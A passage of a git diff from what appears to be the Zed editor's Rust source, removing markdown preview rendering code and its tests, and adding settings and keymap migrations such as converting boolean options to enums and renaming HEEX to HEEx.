max_column_count); - - for (row_idx, row) in parsed.header.iter().chain(parsed.body.iter()).enumerate() { - let mut col_idx = 0; - - for cell in row.columns.iter() { - // Skip columns occupied by row-spanning cells from previous rows - while col_idx < max_column_count && grid_occupied[row_idx][col_idx] { - col_idx += 1; - } - - if col_idx >= max_column_count { - break; - } - - let container = match cell.alignment { - ParsedMarkdownTableAlignment::Left | ParsedMarkdownTableAlignment::None => div(), - ParsedMarkdownTableAlignment::Center => v_flex().items_center(), - ParsedMarkdownTableAlignment::Right => v_flex().items_end(), - }; - - let cell_element = container - .col_span(cell.col_span.min(max_column_count - col_idx) as u16) - .row_span(cell.row_span.min(total_rows - row_idx) as u16) - .children(render_markdown_text(&cell.children, cx)) - .px_2() - .py_1() - .when(col_idx > 0, |this| this.border_l_1()) - .when(row_idx > 0, |this| this.border_t_1()) - .border_color(cx.border_color) - .when(cell.is_header, |this| { - this.bg(cx.title_bar_background_color) - }) - .when(cell.row_span > 1, |this| this.justify_center()) - .when(row_idx % 2 == 1, |this| this.bg(cx.panel_background_color)); - - cells.push(cell_element); - - // Mark grid positions as occupied for row-spanning cells - for r in 0..cell.row_span { - for c in 0..cell.col_span { - if row_idx + r < total_rows && col_idx + c < max_column_count { - grid_occupied[row_idx + r][col_idx + c] = true; - } - } - } - - col_idx += cell.col_span; - } - - // Fill remaining columns with empty cells if needed - while col_idx < max_column_count { - if grid_occupied[row_idx][col_idx] { - col_idx += 1; - continue; - } - - let empty_cell = div() - .when(col_idx > 0, |this| this.border_l_1()) - .when(row_idx > 0, |this| this.border_t_1()) - .border_color(cx.border_color) - .when(row_idx % 2 == 1, |this| this.bg(cx.panel_background_color)); - - cells.push(empty_cell); - col_idx += 1; - } - } - - cx.with_common_p(v_flex().items_start()) - .when_some(parsed.caption.as_ref(), |this, caption| { - this.children(render_markdown_text(caption, cx)) - }) - .border_1() - .border_color(cx.border_color) - .rounded_sm() - .overflow_hidden() - .child( - div() - .min_w_0() - .w_full() - .grid() - .grid_cols(max_column_count as u16) - .children(cells), - ) - .into_any() -} - -fn render_markdown_block_quote( - parsed: &ParsedMarkdownBlockQuote, - cx: &mut RenderContext, -) -> AnyElement { - cx.indent += 1; - - let children: Vec = parsed - .children - .iter() - .enumerate() - .map(|(ix, child)| { - cx.with_last_child(ix + 1 == parsed.children.len(), |cx| { - render_markdown_block(child, cx) - }) - }) - .collect(); - - cx.indent -= 1; - - cx.with_common_p(div()) - .child( - div() - .border_l_4() - .border_color(cx.border_color) - .pl_3() - .children(children), - ) - .into_any() -} - -fn render_markdown_code_block( - parsed: &ParsedMarkdownCodeBlock, - cx: &mut RenderContext, -) -> AnyElement { - let body = if let Some(highlights) = parsed.highlights.as_ref() { - StyledText::new(parsed.contents.clone()).with_default_highlights( - &cx.buffer_text_style, - highlights.iter().filter_map(|(range, highlight_id)| { - highlight_id - .style(cx.syntax_theme.as_ref()) - .map(|style| (range.clone(), style)) - }), - ) - } else { - StyledText::new(parsed.contents.clone()) - }; - - let copy_block_button = CopyButton::new("copy-codeblock", parsed.contents.clone()) - .tooltip_label("Copy Codeblock") - .visible_on_hover("markdown-block"); - - let font = gpui::Font { - family: cx.buffer_font_family.clone(), - features: cx.buffer_text_style.font_features.clone(), - ..Default::default() - }; - - cx.with_common_p(div()) - .font(font) - .px_3() - .py_3() - .bg(cx.code_block_background_color) - .rounded_sm() - .child(body) - .child( - div() - .h_flex() - .absolute() - .right_1() - .top_1() - .child(copy_block_button), - ) - .into_any() -} - -fn render_mermaid_diagram( - parsed: &ParsedMarkdownMermaidDiagram, - cx: &mut RenderContext, -) -> AnyElement { - let cached = cx.mermaid_state.cache.get(&parsed.contents); - - if let Some(result) = cached.and_then(|c| c.render_image.get()) { - match result { - Ok(render_image) => cx - .with_common_p(div()) - .px_3() - .py_3() - .bg(cx.code_block_background_color) - .rounded_sm() - .child( - div().w_full().child( - img(ImageSource::Render(render_image.clone())) - .max_w_full() - .with_fallback(|| { - div() - .child(Label::new("Failed to load mermaid diagram")) - .into_any_element() - }), - ), - ) - .into_any(), - Err(_) => cx - .with_common_p(div()) - .px_3() - .py_3() - .bg(cx.code_block_background_color) - .rounded_sm() - .child(StyledText::new(parsed.contents.contents.clone())) - .into_any(), - } - } else if let Some(fallback) = cached.and_then(|c| c.fallback_image.as_ref()) { - cx.with_common_p(div()) - .px_3() - .py_3() - .bg(cx.code_block_background_color) - .rounded_sm() - .child( - div() - .w_full() - .child( - img(ImageSource::Render(fallback.clone())) - .max_w_full() - .with_fallback(|| { - div() - .child(Label::new("Failed to load mermaid diagram")) - .into_any_element() - }), - ) - .with_animation( - "mermaid-fallback-pulse", - Animation::new(Duration::from_secs(2)) - .repeat() - .with_easing(pulsating_between(0.6, 1.0)), - |el, delta| el.opacity(delta), - ), - ) - .into_any() - } else { - cx.with_common_p(div()) - .px_3() - .py_3() - .bg(cx.code_block_background_color) - .rounded_sm() - .child( - Label::new("Rendering mermaid diagram...") - .color(Color::Muted) - .with_animation( - "mermaid-loading-pulse", - Animation::new(Duration::from_secs(2)) - .repeat() - .with_easing(pulsating_between(0.4, 0.8)), - |label, delta| label.alpha(delta), - ), - ) - .into_any() - } -} - -fn render_markdown_paragraph(parsed: &MarkdownParagraph, cx: &mut RenderContext) -> AnyElement { - cx.with_common_p(div()) - .children(render_markdown_text(parsed, cx)) - .flex() - .flex_col() - .into_any_element() -} - -fn render_markdown_text(parsed_new: &MarkdownParagraph, cx: &mut RenderContext) -> Vec { - let mut any_element = Vec::with_capacity(parsed_new.len()); - // these values are cloned in-order satisfy borrow checker - let syntax_theme = cx.syntax_theme.clone(); - let workspace_clone = cx.workspace.clone(); - let code_span_bg_color = cx.code_span_background_color; - let text_style = cx.text_style.clone(); - let link_color = cx.link_color; - - for parsed_region in parsed_new { - match parsed_region { - MarkdownParagraphChunk::Text(parsed) => { - let element_id = cx.next_id(&parsed.source_range); - - let highlights = gpui::combine_highlights( - parsed.highlights.iter().filter_map(|(range, highlight)| { - highlight - .to_highlight_style(&syntax_theme) - .map(|style| (range.clone(), style)) - }), - parsed.regions.iter().filter_map(|(range, region)| { - if region.code { - Some(( - range.clone(), - HighlightStyle { - background_color: Some(code_span_bg_color), - ..Default::default() - }, - )) - } else if region.link.is_some() { - Some(( - range.clone(), - HighlightStyle { - color: Some(link_color), - ..Default::default() - }, - )) - } else { - None - } - }), - ); - let mut links = Vec::new(); - let mut link_ranges = Vec::new(); - for (range, region) in parsed.regions.iter() { - if let Some(link) = region.link.clone() { - links.push(link); - link_ranges.push(range.clone()); - } - } - let workspace = workspace_clone.clone(); - let element = div() - .child( - InteractiveText::new( - element_id, - StyledText::new(parsed.contents.clone()) - .with_default_highlights(&text_style, highlights), - ) - .tooltip({ - let links = links.clone(); - let link_ranges = link_ranges.clone(); - move |idx, _, cx| { - for (ix, range) in link_ranges.iter().enumerate() { - if range.contains(&idx) { - return Some(LinkPreview::new(&links[ix].to_string(), cx)); - } - } - None - } - }) - .on_click( - link_ranges, - move |clicked_range_ix, window, cx| match &links[clicked_range_ix] { - Link::Web { url } => cx.open_url(url), - Link::Path { path, .. } => { - if let Some(workspace) = &workspace { - _ = workspace.update(cx, |workspace, cx| { - workspace - .open_abs_path( - normalize_path(path.clone().as_path()), - OpenOptions { - visible: Some(OpenVisible::None), - ..Default::default() - }, - window, - cx, - ) - .detach(); - }); - } - } - }, - ), - ) - .into_any(); - any_element.push(element); - } - - MarkdownParagraphChunk::Image(image) => { - any_element.push(render_markdown_image(image, cx)); - } - } - } - - any_element -} - -fn render_markdown_rule(cx: &mut RenderContext) -> AnyElement { - let rule = div().w_full().h(cx.scaled_rems(0.125)).bg(cx.border_color); - div().py(cx.scaled_rems(0.5)).child(rule).into_any() -} - -fn render_markdown_image(image: &Image, cx: &mut RenderContext) -> AnyElement { - let image_resource = match image.link.clone() { - Link::Web { url } => Resource::Uri(url.into()), - Link::Path { path, .. } => Resource::Path(Arc::from(path)), - }; - - let element_id = cx.next_id(&image.source_range); - let workspace = cx.workspace.clone(); - - div() - .id(element_id) - .cursor_pointer() - .child( - img(ImageSource::Resource(image_resource)) - .max_w_full() - .with_fallback({ - let alt_text = image.alt_text.clone(); - move || div().children(alt_text.clone()).into_any_element() - }) - .when_some(image.height, |this, height| this.h(height)) - .when_some(image.width, |this, width| this.w(width)), - ) - .tooltip({ - let link = image.link.clone(); - let alt_text = image.alt_text.clone(); - move |_, cx| { - InteractiveMarkdownElementTooltip::new( - Some(alt_text.clone().unwrap_or(link.to_string().into())), - "open image", - cx, - ) - .into() - } - }) - .on_click({ - let link = image.link.clone(); - move |_, window, cx| { - if window.modifiers().secondary() { - match &link { - Link::Web { url } => cx.open_url(url), - Link::Path { path, .. } => { - if let Some(workspace) = &workspace { - _ = workspace.update(cx, |workspace, cx| { - workspace - .open_abs_path( - path.clone(), - OpenOptions { - visible: Some(OpenVisible::None), - ..Default::default() - }, - window, - cx, - ) - .detach(); - }); - } - } - } - } - } - }) - .into_any() -} - -struct InteractiveMarkdownElementTooltip { - tooltip_text: Option, - action_text: SharedString, -} - -impl InteractiveMarkdownElementTooltip { - pub fn new( - tooltip_text: Option, - action_text: impl Into, - cx: &mut App, - ) -> Entity { - let tooltip_text = tooltip_text.map(|t| util::truncate_and_trailoff(&t, 50).into()); - - cx.new(|_cx| Self { - tooltip_text, - action_text: action_text.into(), - }) - } -} - -impl Render for InteractiveMarkdownElementTooltip { - fn render(&mut self, _: &mut Window, cx: &mut Context) -> impl IntoElement { - tooltip_container(cx, |el, _| { - let secondary_modifier = Keystroke { - modifiers: Modifiers::secondary_key(), - ..Default::default() - }; - - el.child( - v_flex() - .gap_1() - .when_some(self.tooltip_text.clone(), |this, text| { - this.child(Label::new(text).size(LabelSize::Small)) - }) - .child( - Label::new(format!( - "{}-click to {}", - secondary_modifier, self.action_text - )) - .size(LabelSize::Small) - .color(Color::Muted), - ), - ) - }) - } -} - -/// Returns the prefix for a list item. -fn list_item_prefix(order: usize, ordered: bool, depth: usize) -> String { - let ix = order.saturating_sub(1); - const NUMBERED_PREFIXES_1: &str = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; - const NUMBERED_PREFIXES_2: &str = "abcdefghijklmnopqrstuvwxyz"; - const BULLETS: [&str; 5] = ["•", "◦", "▪", "‣", "⁃"]; - - if ordered { - match depth { - 0 => format!("{}. ", order), - 1 => format!( - "{}. ", - NUMBERED_PREFIXES_1 - .chars() - .nth(ix % NUMBERED_PREFIXES_1.len()) - .unwrap() - ), - _ => format!( - "{}. ", - NUMBERED_PREFIXES_2 - .chars() - .nth(ix % NUMBERED_PREFIXES_2.len()) - .unwrap() - ), - } - } else { - let depth = depth.min(BULLETS.len() - 1); - let bullet = BULLETS[depth]; - return format!("{} ", bullet); - } -} - -#[cfg(test)] -mod tests { - use super::*; - use crate::markdown_elements::ParsedMarkdownMermaidDiagramContents; - use crate::markdown_elements::ParsedMarkdownTableColumn; - use crate::markdown_elements::ParsedMarkdownText; - - fn text(text: &str) -> MarkdownParagraphChunk { - MarkdownParagraphChunk::Text(ParsedMarkdownText { - source_range: 0..text.len(), - contents: SharedString::new(text), - highlights: Default::default(), - regions: Default::default(), - }) - } - - fn column( - col_span: usize, - row_span: usize, - children: Vec, - ) -> ParsedMarkdownTableColumn { - ParsedMarkdownTableColumn { - col_span, - row_span, - is_header: false, - children, - alignment: ParsedMarkdownTableAlignment::None, - } - } - - fn column_with_row_span( - col_span: usize, - row_span: usize, - children: Vec, - ) -> ParsedMarkdownTableColumn { - ParsedMarkdownTableColumn { - col_span, - row_span, - is_header: false, - children, - alignment: ParsedMarkdownTableAlignment::None, - } - } - - #[test] - fn test_calculate_table_columns_count() { - assert_eq!(0, calculate_table_columns_count(&vec![])); - - assert_eq!( - 1, - calculate_table_columns_count(&vec![ParsedMarkdownTableRow::with_columns(vec![ - column(1, 1, vec![text("column1")]) - ])]) - ); - - assert_eq!( - 2, - calculate_table_columns_count(&vec![ParsedMarkdownTableRow::with_columns(vec![ - column(1, 1, vec![text("column1")]), - column(1, 1, vec![text("column2")]), - ])]) - ); - - assert_eq!( - 2, - calculate_table_columns_count(&vec![ParsedMarkdownTableRow::with_columns(vec![ - column(2, 1, vec![text("column1")]) - ])]) - ); - - assert_eq!( - 3, - calculate_table_columns_count(&vec![ParsedMarkdownTableRow::with_columns(vec![ - column(1, 1, vec![text("column1")]), - column(2, 1, vec![text("column2")]), - ])]) - ); - - assert_eq!( - 2, - calculate_table_columns_count(&vec![ - ParsedMarkdownTableRow::with_columns(vec![ - column(1, 1, vec![text("column1")]), - column(1, 1, vec![text("column2")]), - ]), - ParsedMarkdownTableRow::with_columns(vec![column(1, 1, vec![text("column1")]),]) - ]) - ); - - assert_eq!( - 3, - calculate_table_columns_count(&vec![ - ParsedMarkdownTableRow::with_columns(vec![ - column(1, 1, vec![text("column1")]), - column(1, 1, vec![text("column2")]), - ]), - ParsedMarkdownTableRow::with_columns(vec![column(3, 3, vec![text("column1")]),]) - ]) - ); - } - - #[test] - fn test_row_span_support() { - assert_eq!( - 3, - calculate_table_columns_count(&vec![ - ParsedMarkdownTableRow::with_columns(vec![ - column_with_row_span(1, 2, vec![text("spans 2 rows")]), - column(1, 1, vec![text("column2")]), - column(1, 1, vec![text("column3")]), - ]), - ParsedMarkdownTableRow::with_columns(vec![ - // First column is covered by row span from above - column(1, 1, vec![text("column2 row2")]), - column(1, 1, vec![text("column3 row2")]), - ]) - ]) - ); - - assert_eq!( - 4, - calculate_table_columns_count(&vec![ - ParsedMarkdownTableRow::with_columns(vec![ - column_with_row_span(1, 3, vec![text("spans 3 rows")]), - column_with_row_span(2, 1, vec![text("spans 2 cols")]), - column(1, 1, vec![text("column4")]), - ]), - ParsedMarkdownTableRow::with_columns(vec![ - // First column covered by row span - column(1, 1, vec![text("column2")]), - column(1, 1, vec![text("column3")]), - column(1, 1, vec![text("column4")]), - ]), - ParsedMarkdownTableRow::with_columns(vec![ - // First column still covered by row span - column(3, 1, vec![text("spans 3 cols")]), - ]) - ]) - ); - } - - #[test] - fn test_list_item_prefix() { - assert_eq!(list_item_prefix(1, true, 0), "1. "); - assert_eq!(list_item_prefix(2, true, 0), "2. "); - assert_eq!(list_item_prefix(3, true, 0), "3. "); - assert_eq!(list_item_prefix(11, true, 0), "11. "); - assert_eq!(list_item_prefix(1, true, 1), "A. "); - assert_eq!(list_item_prefix(2, true, 1), "B. "); - assert_eq!(list_item_prefix(3, true, 1), "C. "); - assert_eq!(list_item_prefix(1, true, 2), "a. "); - assert_eq!(list_item_prefix(2, true, 2), "b. "); - assert_eq!(list_item_prefix(7, true, 2), "g. "); - assert_eq!(list_item_prefix(1, true, 1), "A. "); - assert_eq!(list_item_prefix(1, true, 2), "a. "); - assert_eq!(list_item_prefix(1, false, 0), "• "); - assert_eq!(list_item_prefix(1, false, 1), "◦ "); - assert_eq!(list_item_prefix(1, false, 2), "▪ "); - assert_eq!(list_item_prefix(1, false, 3), "‣ "); - assert_eq!(list_item_prefix(1, false, 4), "⁃ "); - } - - fn mermaid_contents(s: &str) -> ParsedMarkdownMermaidDiagramContents { - ParsedMarkdownMermaidDiagramContents { - contents: SharedString::from(s.to_string()), - scale: 1, - } - } - - fn mermaid_sequence(diagrams: &[&str]) -> Vec { - diagrams - .iter() - .map(|diagram| mermaid_contents(diagram)) - .collect() - } - - fn mermaid_fallback( - new_diagram: &str, - new_full_order: &[ParsedMarkdownMermaidDiagramContents], - old_full_order: &[ParsedMarkdownMermaidDiagramContents], - cache: &MermaidDiagramCache, - ) -> Option> { - let new_content = mermaid_contents(new_diagram); - let idx = new_full_order - .iter() - .position(|content| content == &new_content)?; - MermaidState::get_fallback_image(idx, old_full_order, new_full_order.len(), cache) - } - - fn mock_render_image() -> Arc { - Arc::new(RenderImage::new(Vec::new())) - } - - #[test] - fn test_mermaid_fallback_on_edit() { - let old_full_order = mermaid_sequence(&["graph A", "graph B", "graph C"]); - let new_full_order = mermaid_sequence(&["graph A", "graph B modified", "graph C"]); - - let svg_b = mock_render_image(); - let mut cache: MermaidDiagramCache = HashMap::default(); - cache.insert( - mermaid_contents("graph A"), - CachedMermaidDiagram::new_for_test(Some(mock_render_image()), None), - ); - cache.insert( - mermaid_contents("graph B"), - CachedMermaidDiagram::new_for_test(Some(svg_b.clone()), None), - ); - cache.insert( - mermaid_contents("graph C"), - CachedMermaidDiagram::new_for_test(Some(mock_render_image()), None), - ); - - let fallback = - mermaid_fallback("graph B modified", &new_full_order, &old_full_order, &cache); - - assert!( - fallback.is_some(), - "Should use old diagram as fallback when editing" - ); - assert!( - Arc::ptr_eq(&fallback.unwrap(), &svg_b), - "Fallback should be the old diagram's SVG" - ); - } - - #[test] - fn test_mermaid_no_fallback_on_add_in_middle() { - let old_full_order = mermaid_sequence(&["graph A", "graph C"]); - let new_full_order = mermaid_sequence(&["graph A", "graph NEW", "graph C"]); - - let mut cache: MermaidDiagramCache = HashMap::default(); - cache.insert( - mermaid_contents("graph A"), - CachedMermaidDiagram::new_for_test(Some(mock_render_image()), None), - ); - cache.insert( - mermaid_contents("graph C"), - CachedMermaidDiagram::new_for_test(Some(mock_render_image()), None), - ); - - let fallback = mermaid_fallback("graph NEW", &new_full_order, &old_full_order, &cache); - - assert!( - fallback.is_none(), - "Should NOT use fallback when adding new diagram" - ); - } - - #[test] - fn test_mermaid_fallback_chains_on_rapid_edits() { - let old_full_order = mermaid_sequence(&["graph A", "graph B modified", "graph C"]); - let new_full_order = mermaid_sequence(&["graph A", "graph B modified again", "graph C"]); - - let original_svg = mock_render_image(); - let mut cache: MermaidDiagramCache = HashMap::default(); - cache.insert( - mermaid_contents("graph A"), - CachedMermaidDiagram::new_for_test(Some(mock_render_image()), None), - ); - cache.insert( - mermaid_contents("graph B modified"), - // Still rendering, but has fallback from original "graph B" - CachedMermaidDiagram::new_for_test(None, Some(original_svg.clone())), - ); - cache.insert( - mermaid_contents("graph C"), - CachedMermaidDiagram::new_for_test(Some(mock_render_image()), None), - ); - - let fallback = mermaid_fallback( - "graph B modified again", - &new_full_order, - &old_full_order, - &cache, - ); - - assert!( - fallback.is_some(), - "Should chain fallback when previous render not complete" - ); - assert!( - Arc::ptr_eq(&fallback.unwrap(), &original_svg), - "Fallback should chain through to the original SVG" - ); - } - - #[test] - fn test_mermaid_no_fallback_when_no_old_diagram_at_index() { - let old_full_order = mermaid_sequence(&["graph A"]); - let new_full_order = mermaid_sequence(&["graph A", "graph B"]); - - let mut cache: MermaidDiagramCache = HashMap::default(); - cache.insert( - mermaid_contents("graph A"), - CachedMermaidDiagram::new_for_test(Some(mock_render_image()), None), - ); - - let fallback = mermaid_fallback("graph B", &new_full_order, &old_full_order, &cache); - - assert!( - fallback.is_none(), - "Should NOT have fallback when adding diagram at end" - ); - } - - #[test] - fn test_mermaid_fallback_with_duplicate_blocks_edit_first() { - let old_full_order = mermaid_sequence(&["graph A", "graph A", "graph B"]); - let new_full_order = mermaid_sequence(&["graph A edited", "graph A", "graph B"]); - - let svg_a = mock_render_image(); - let mut cache: MermaidDiagramCache = HashMap::default(); - cache.insert( - mermaid_contents("graph A"), - CachedMermaidDiagram::new_for_test(Some(svg_a.clone()), None), - ); - cache.insert( - mermaid_contents("graph B"), - CachedMermaidDiagram::new_for_test(Some(mock_render_image()), None), - ); - - let fallback = mermaid_fallback("graph A edited", &new_full_order, &old_full_order, &cache); - - assert!( - fallback.is_some(), - "Should use old diagram as fallback when editing one of duplicate blocks" - ); - assert!( - Arc::ptr_eq(&fallback.unwrap(), &svg_a), - "Fallback should be the old duplicate diagram's image" - ); - } - - #[test] - fn test_mermaid_fallback_with_duplicate_blocks_edit_second() { - let old_full_order = mermaid_sequence(&["graph A", "graph A", "graph B"]); - let new_full_order = mermaid_sequence(&["graph A", "graph A edited", "graph B"]); - - let svg_a = mock_render_image(); - let mut cache: MermaidDiagramCache = HashMap::default(); - cache.insert( - mermaid_contents("graph A"), - CachedMermaidDiagram::new_for_test(Some(svg_a.clone()), None), - ); - cache.insert( - mermaid_contents("graph B"), - CachedMermaidDiagram::new_for_test(Some(mock_render_image()), None), - ); - - let fallback = mermaid_fallback("graph A edited", &new_full_order, &old_full_order, &cache); - - assert!( - fallback.is_some(), - "Should use old diagram as fallback when editing the second duplicate block" - ); - assert!( - Arc::ptr_eq(&fallback.unwrap(), &svg_a), - "Fallback should be the old duplicate diagram's image" - ); - } -} diff --git a/crates/migrator/src/migrations.rs b/crates/migrator/src/migrations.rs index d10116be6032486c92d9f27afcf922178463e151..625bd27e91e117662f9a47edaaac2ddaa7d2ba1c 100644 --- a/crates/migrator/src/migrations.rs +++ b/crates/migrator/src/migrations.rs @@ -275,6 +275,12 @@ pub(crate) mod m_2025_12_15 { pub(crate) use settings::SETTINGS_PATTERNS; } +pub(crate) mod m_2025_01_27 { + mod settings; + + pub(crate) use settings::make_auto_indent_an_enum; +} + pub(crate) mod m_2026_02_02 { mod settings; @@ -298,3 +304,27 @@ pub(crate) mod m_2026_02_25 { pub(crate) use settings::migrate_builtin_agent_servers_to_registry; } + +pub(crate) mod m_2026_03_16 { + mod settings; + + pub(crate) use settings::SETTINGS_PATTERNS; +} + +pub(crate) mod m_2026_03_23 { + mod keymap; + + pub(crate) use keymap::KEYMAP_PATTERNS; +} + +pub(crate) mod m_2026_03_30 { + mod settings; + + pub(crate) use settings::make_play_sound_when_agent_done_an_enum; +} + +pub(crate) mod m_2026_04_01 { + mod settings; + + pub(crate) use settings::restructure_profiles_with_settings_key; +} diff --git a/crates/migrator/src/migrations/m_2025_01_27/settings.rs b/crates/migrator/src/migrations/m_2025_01_27/settings.rs new file mode 100644 index 0000000000000000000000000000000000000000..e8df2aa8aabed4daaae3e45e97532c1ce3557dfe --- /dev/null +++ b/crates/migrator/src/migrations/m_2025_01_27/settings.rs @@ -0,0 +1,27 @@ +use anyhow::Result; +use serde_json::Value; + +use crate::migrations::migrate_language_setting; + +pub fn make_auto_indent_an_enum(value: &mut Value) -> Result<()> { + migrate_language_setting(value, migrate_auto_indent) +} + +fn migrate_auto_indent(value: &mut Value, _path: &[&str]) -> Result<()> { + let Some(auto_indent) = value + .as_object_mut() + .and_then(|obj| obj.get_mut("auto_indent")) + else { + return Ok(()); + }; + + *auto_indent = match auto_indent { + Value::Bool(true) => Value::String("syntax_aware".to_string()), + Value::Bool(false) => Value::String("none".to_string()), + Value::String(s) if s == "syntax_aware" || s == "preserve_indent" || s == "none" => { + return Ok(()); + } + _ => anyhow::bail!("Expected auto_indent to be a boolean or valid enum value"), + }; + Ok(()) +} diff --git a/crates/migrator/src/migrations/m_2026_03_16/settings.rs b/crates/migrator/src/migrations/m_2026_03_16/settings.rs new file mode 100644 index 0000000000000000000000000000000000000000..203d29df904d110d8c7b5ffdb257bb28d3eee601 --- /dev/null +++ b/crates/migrator/src/migrations/m_2026_03_16/settings.rs @@ -0,0 +1,50 @@ +use std::ops::Range; +use tree_sitter::{Query, QueryMatch}; + +use crate::MigrationPatterns; +use crate::patterns::SETTINGS_NESTED_KEY_VALUE_PATTERN; + +pub const SETTINGS_PATTERNS: MigrationPatterns = + &[(SETTINGS_NESTED_KEY_VALUE_PATTERN, rename_heex_settings)]; + +fn rename_heex_settings( + contents: &str, + mat: &QueryMatch, + query: &Query, +) -> Option<(Range, String)> { + if !is_heex_settings(contents, mat, query) { + return None; + } + + let setting_name_ix = query.capture_index_for_name("setting_name")?; + let setting_name_range = mat + .nodes_for_capture_index(setting_name_ix) + .next()? + .byte_range(); + + Some((setting_name_range, "HEEx".to_string())) +} + +fn is_heex_settings(contents: &str, mat: &QueryMatch, query: &Query) -> bool { + let parent_key_ix = match query.capture_index_for_name("parent_key") { + Some(ix) => ix, + None => return false, + }; + let parent_range = match mat.nodes_for_capture_index(parent_key_ix).next() { + Some(node) => node.byte_range(), + None => return false, + }; + if contents.get(parent_range) != Some("languages") { + return false; + } + + let setting_name_ix = match query.capture_index_for_name("setting_name") { + Some(ix) => ix, + None => return false, + }; + let setting_name_range = match mat.nodes_for_capture_index(setting_name_ix).next() { + Some(node) => node.byte_range(), + None => return false, + }; + contents.get(setting_name_range) == Some("HEEX") +} diff --git a/crates/migrator/src/migrations/m_2026_03_23/keymap.rs b/crates/migrator/src/migrations/m_2026_03_23/keymap.rs new file mode 100644 index 0000000000000000000000000000000000000000..8fadc8201a0d2846e66ddf0de80275732d701acd --- /dev/null +++ b/crates/migrator/src/migrations/m_2026_03_23/keymap.rs @@ -0,0 +1,47 @@ +use std::ops::Range; + +use tree_sitter::{Query, QueryMatch}; + +use crate::MigrationPatterns; + +pub const KEYMAP_PATTERNS: MigrationPatterns = + &[(crate::patterns::KEYMAP_CONTEXT_PATTERN, rename_context_key)]; + +fn rename_context_key( + contents: &str, + mat: &QueryMatch, + query: &Query, +) -> Option<(Range, String)> { + let context_predicate_ix = query.capture_index_for_name("context_predicate")?; + let context_predicate_range = mat + .nodes_for_capture_index(context_predicate_ix) + .next()? + .byte_range(); + let old_predicate = contents.get(context_predicate_range.clone())?.to_string(); + let mut new_predicate = old_predicate.clone(); + + const REPLACEMENTS: &[(&str, &str)] = &[ + ( + "edit_prediction_conflict && !showing_completions", + "(edit_prediction && in_leading_whitespace)", + ), + ( + "edit_prediction_conflict && showing_completions", + "(edit_prediction && showing_completions)", + ), + ( + "edit_prediction_conflict", + "(edit_prediction && (showing_completions || in_leading_whitespace))", + ), + ]; + + for (old, new) in REPLACEMENTS { + new_predicate = new_predicate.replace(old, new); + } + + if new_predicate != old_predicate { + Some((context_predicate_range, new_predicate)) + } else { + None + } +} diff --git a/crates/migrator/src/migrations/m_2026_03_30/settings.rs b/crates/migrator/src/migrations/m_2026_03_30/settings.rs new file mode 100644 index 0000000000000000000000000000000000000000..598941a6212442a4562814d43df6184e4eb76640 --- /dev/null +++ b/crates/migrator/src/migrations/m_2026_03_30/settings.rs @@ -0,0 +1,29 @@ +use anyhow::Result; +use serde_json::Value; + +use crate::migrations::migrate_settings; + +pub fn make_play_sound_when_agent_done_an_enum(value: &mut Value) -> Result<()> { + migrate_settings(value, &mut migrate_one) +} + +fn migrate_one(obj: &mut serde_json::Map) -> Result<()> { + let Some(play_sound) = obj + .get_mut("agent") + .and_then(|agent| agent.as_object_mut()) + .and_then(|agent| agent.get_mut("play_sound_when_agent_done")) + else { + return Ok(()); + }; + + *play_sound = match play_sound { + Value::Bool(true) => Value::String("always".to_string()), + Value::Bool(false) => Value::String("never".to_string()), + Value::String(s) if s == "never" || s == "when_hidden" || s == "always" => return Ok(()), + _ => { + anyhow::bail!("Expected play_sound_when_agent_done to be a boolean or valid enum value") + } + }; + + Ok(()) +} diff --git a/crates/migrator/src/migrations/m_2026_04_01/settings.rs b/crates/migrator/src/migrations/m_2026_04_01/settings.rs new file mode 100644 index 0000000000000000000000000000000000000000..240572fa7754e29d43b23f178115878a99760729 --- /dev/null +++ b/crates/migrator/src/migrations/m_2026_04_01/settings.rs @@ -0,0 +1,29 @@ +use anyhow::Result; +use serde_json::Value; + +pub fn restructure_profiles_with_settings_key(value: &mut Value) -> Result<()> { + let Some(root_object) = value.as_object_mut() else { + return Ok(()); + }; + + let Some(profiles) = root_object.get_mut("profiles") else { + return Ok(()); + }; + + let Some(profiles_map) = profiles.as_object_mut() else { + return Ok(()); + }; + + for profile_value in profiles_map.values_mut() { + if profile_value + .as_object() + .is_some_and(|m| m.contains_key("settings") || m.contains_key("base")) + { + continue; + } + + *profile_value = serde_json::json!({ "settings": profile_value }); + } + + Ok(()) +} diff --git a/crates/migrator/src/migrator.rs b/crates/migrator/src/migrator.rs index 8b501020a559c74d81c5ad5b37e1adf60a964927..f49d102213c446be17c7d240d272cf4b516d912c 100644 --- a/crates/migrator/src/migrator.rs +++ b/crates/migrator/src/migrator.rs @@ -143,6 +143,10 @@ pub fn migrate_keymap(text: &str) -> Result> { migrations::m_2025_12_08::KEYMAP_PATTERNS, &KEYMAP_QUERY_2025_12_08, ), + MigrationType::TreeSitter( + migrations::m_2026_03_23::KEYMAP_PATTERNS, + &KEYMAP_QUERY_2026_03_23, + ), ]; run_migrations(text, migrations) } @@ -232,12 +236,19 @@ pub fn migrate_settings(text: &str) -> Result> { migrations::m_2025_12_15::SETTINGS_PATTERNS, &SETTINGS_QUERY_2025_12_15, ), + MigrationType::Json(migrations::m_2025_01_27::make_auto_indent_an_enum), MigrationType::Json( migrations::m_2026_02_02::move_edit_prediction_provider_to_edit_predictions, ), MigrationType::Json(migrations::m_2026_02_03::migrate_experimental_sweep_mercury), MigrationType::Json(migrations::m_2026_02_04::migrate_tool_permission_defaults), MigrationType::Json(migrations::m_2026_02_25::migrate_builtin_agent_servers_to_registry), + MigrationType::TreeSitter( + migrations::m_2026_03_16::SETTINGS_PATTERNS, + &SETTINGS_QUERY_2026_03_16, + ), + MigrationType::Json(migrations::m_2026_03_30::make_play_sound_when_agent_done_an_enum), + MigrationType::Json(migrations::m_2026_04_01::restructure_profiles_with_settings_key), ]; run_migrations(text, migrations) } @@ -372,6 +383,14 @@ define_query!( SETTINGS_QUERY_2025_12_15, migrations::m_2025_12_15::SETTINGS_PATTERNS ); +define_query!( + SETTINGS_QUERY_2026_03_16, + migrations::m_2026_03_16::SETTINGS_PATTERNS +); +define_query!( + KEYMAP_QUERY_2026_03_23, + migrations::m_2026_03_23::KEYMAP_PATTERNS +); // custom query static EDIT_PREDICTION_SETTINGS_MIGRATION_QUERY: LazyLock = LazyLock::new(|| { @@ -399,6 +418,7 @@ mod tests { } } + #[track_caller] fn assert_migrate_keymap(input: &str, output: Option<&str>) { let migrated = migrate_keymap(input).unwrap(); pretty_assertions::assert_eq!(migrated.as_deref(), output); @@ -417,7 +437,7 @@ mod tests { } #[track_caller] - fn 